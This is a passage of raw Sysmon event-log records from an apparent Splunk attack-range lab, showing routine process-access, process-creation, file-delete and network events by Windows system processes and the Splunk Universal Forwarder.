10341000x8000000000000000221941Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:49.666{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221940Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:49.666{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221939Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:49.666{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221938Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:49.666{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221937Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:49.666{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221936Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:49.666{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221935Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:49.666{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1855-6216-2905-000000003902}3200C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000221934Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:49.666{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1855-6216-2905-000000003902}3200C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000221933Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:49.668{4F8D34B0-1855-6216-2905-000000003902}3200C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000221932Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:49.573{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4839CFC7FF44B3737080A93F4DC4A6B2,SHA256=B66452405EBD0ABBD9E1D77A7B6C47C0C2A44C35E6250FDFBE5A718A160960D9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000221931Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:49.260{4F8D34B0-1855-6216-2805-000000003902}40761156C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221930Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:49.041{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1855-6216-2805-000000003902}4076C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221929Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:49.041{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221928Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:49.041{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221927Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:49.041{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221926Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:49.041{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221925Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:49.041{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221924Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:49.041{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221923Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:49.041{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221922Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:49.041{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221921Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:49.041{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221920Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:49.041{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1855-6216-2805-000000003902}4076C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000221919Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:49.041{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1855-6216-2805-000000003902}4076C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000221918Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:49.042{4F8D34B0-1855-6216-2805-000000003902}4076C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000298058Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:50.727{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12E8EF482B4945469617CC06D947CB97,SHA256=F43FF185F944B2C7162FFCAE14B13A227FCF8F51C30195F952B955FD8D4DE4B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221948Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:50.603{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFF05251AEFAA6A396C31651A58F138C,SHA256=9E2CD736C894F68F1943FFA546C064AFE93EC6913A727969E45C5B997689CC64,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298057Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:47.664{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49502-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000221947Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:50.103{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5CFEE33ACFC4256932860BF47EF8A33D,SHA256=AC412DA1CC3878D07EE48ECE4A86A9ED225E9DCFB673C3D927AD6168E76847F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298059Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:51.742{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6195D23C48D71AAAF32FBEA6421C3776,SHA256=91CFC950A2F72EBD871F4EFFFC5C455D05B79DD3F152DFAC15F19757D9FBAED1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221963Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:49.605{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 